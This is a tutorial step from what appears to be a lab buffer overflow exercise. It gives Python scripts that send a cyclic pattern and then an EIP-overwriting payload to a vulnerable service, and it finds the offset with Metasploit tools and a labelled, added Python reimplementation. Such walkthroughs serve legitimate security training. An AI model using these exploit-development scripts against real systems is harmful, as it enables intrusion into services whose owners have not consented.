# Controlling the EIP

## Creating Pattern

```
msf-pattern_create -l 600
```

![](/files/-Mdc9bP16twsh759IMUu)

## Update POC

After creating the pattern, modify the code from the previous iteration (Crasher.py) so that it sends the newly generated 600-byte pattern after the `OVERFLOW10 ` prefix, in place of the run of `A`s.

### controllingEip.py

```
#!/usr/bin/python
import socket

try:
    print("\nSending evil buffer...")

    # Command prefix the service expects; the pattern goes right after it.
    # Bytes literals keep the script working under both Python 2 and 3
    # (under Python 3, socket.send() refuses a str).
    prefix = b"OVERFLOW10 "
    # 600-byte cyclic pattern from msf-pattern_create -l 600
    buffer = prefix + b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print("\nDone!")

except Exception as e:
    # A bare except would also hide bugs in the script itself,
    # so report what actually went wrong.
    print("\nCould not connect! %s" % e)
```

### Controlling Eip

```
python controllingEip.py
```

![](/files/-MdcA1ZKr1UmsGVcnS16)

![](/files/-MdcAHXtp2bNQwijy4cr)

`EIP = 41397241`

Inspecting the registers, as shown above, confirms that EIP now holds a unique 4-byte chunk of the pattern (`0x41397241`, which is the bytes `Ar9A` read little-endian) instead of the four `\x41` (`A`) bytes we saw in the previous iteration.

## Locating EIP

Now that we have sent in our custom pattern and extracted the value at EIP, we have to figure out where that value sits in the buffer. The tool `msf-pattern_offset` does this: give it the value exactly as the debugger prints it and the same `-l` length used to create the pattern, and it accounts for the little-endian byte order when searching.

```
msf-pattern_offset -l 600 -q 41397241
```

![](/files/-MdcAmNnIMkUTJoktZxs)

`EIP was found at offset 537`

The offset is measured from the start of the pattern, so it does not include the 11-byte `OVERFLOW10 ` prefix.
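The two Metasploit tools used above can be reproduced in a few lines, which is useful for checking a result or when Metasploit is not installed. The following is an added example, not code from the original page: it reimplements the `Aa0Aa1...` cyclic pattern, looks up the EIP value from the debugger (handling the little-endian reversal of `41397241` into the bytes `Ar9A`), and builds the filler-plus-EIP payload used in the verification step. The function names `pattern_create`, `pattern_offset`, `eip_to_needle` and `build_eip_payload` are this example's own.

```python
#!/usr/bin/env python3
# Added example (not the page's code): pure-Python equivalent of
# msf-pattern_create / msf-pattern_offset plus the payload layout
# used to verify the offset. All names here are illustrative.
import string
import struct

# The pattern is upper-letter, lower-letter, digit, advanced like an
# odometer; every 4-byte window is unique until it wraps at this length.
MAX_UNIQUE = 26 * 26 * 10 * 3  # 20280 bytes


def pattern_create(length):
    """Return the first `length` bytes of the Aa0Aa1Aa2...Ab0... pattern."""
    if length > MAX_UNIQUE:
        raise ValueError("pattern repeats after %d bytes" % MAX_UNIQUE)
    full = "".join(u + l + d
                   for u in string.ascii_uppercase
                   for l in string.ascii_lowercase
                   for d in string.digits)
    return full[:length].encode("ascii")


def eip_to_needle(value):
    """Turn the EIP value as the debugger shows it into the 4 bytes as
    they lie in the buffer. x86 is little-endian, so EIP = 0x41397241
    was loaded from the in-memory bytes 41 72 39 41 = b"Ar9A";
    struct.pack("<I") performs that reversal.

    Accepted forms: bytes (used as-is), int, "0x41397241", "41397241",
    or a short ASCII query such as "Ar9A". Like msf-pattern_offset, an
    8-character string of hex digits is treated as hex; pass bytes if
    you really mean an 8-character ASCII query."""
    if isinstance(value, bytes):
        return value
    if isinstance(value, int):
        return struct.pack("<I", value)
    text = value[2:] if value.lower().startswith("0x") else value
    if len(text) == 8 and all(c in string.hexdigits for c in text):
        return struct.pack("<I", int(text, 16))
    return value.encode("ascii")


def pattern_offset(value, length=600):
    """Offset of `value` inside pattern_create(length), or None if absent.
    `length` must match the -l used when the pattern was generated."""
    needle = eip_to_needle(value)
    pat = pattern_create(length)
    first = pat.find(needle)
    if first == -1:
        return None
    if pat.find(needle, first + 1) != -1:
        raise ValueError("%r is not unique in the pattern" % needle)
    return first


def build_eip_payload(offset, prefix=b"OVERFLOW10 ", eip=b"BBBB"):
    """Filler up to the offset, then the 4 bytes that should land in EIP.
    The offset counts from the start of the pattern, i.e. after the
    prefix, so the prefix is not part of the filler."""
    return prefix + b"A" * offset + eip


def main():
    pat = pattern_create(600)
    off = pattern_offset("41397241", 600)
    print("bytes at pattern[537:541]: %r" % pat[537:541])
    print("offset of EIP 0x41397241:  %s" % off)
    payload = build_eip_payload(off)
    start = len(b"OVERFLOW10 ") + off
    print("payload length %d, bytes %d..%d: %r"
          % (len(payload), start, start + 4, payload[start:start + 4]))


if __name__ == "__main__":
    main()
```

Running it prints the offset 537 and shows the four `B`s sitting at bytes 548..552 of the packet, which is where `Ar9A` was when the pattern was sent.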

### controlledEip.py

Now let's verify the offset by modifying the script again: 537 bytes of filler after the prefix, followed by four `B`s (`\x42\x42\x42\x42`), which should land exactly in EIP.

```
#!/usr/bin/python
import socket

try:
    print("\nSending evil buffer...")

    # Bytes literals work under both Python 2 and 3.
    prefix = b"OVERFLOW10 "
    # Offset from msf-pattern_offset, counted from the end of the prefix
    filler = b"A" * 537
    # These 4 bytes should end up in EIP
    eip = b"B" * 4
    buffer = prefix + filler + eip

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print("\nDone!")

except Exception as e:
    print("\nCould not connect! %s" % e)
```

### Controlled Eip

```
python controlledEip.py
```

![](/files/-MdcBEg3WuZMinHv3Eh8)

![](/files/-MdcBG867pBI4W3H1oRi)

After running the new script, the debugger shows EIP overwritten with `\x42\x42\x42\x42` (`42424242`). We now control EIP and are ready to move on to the next step.


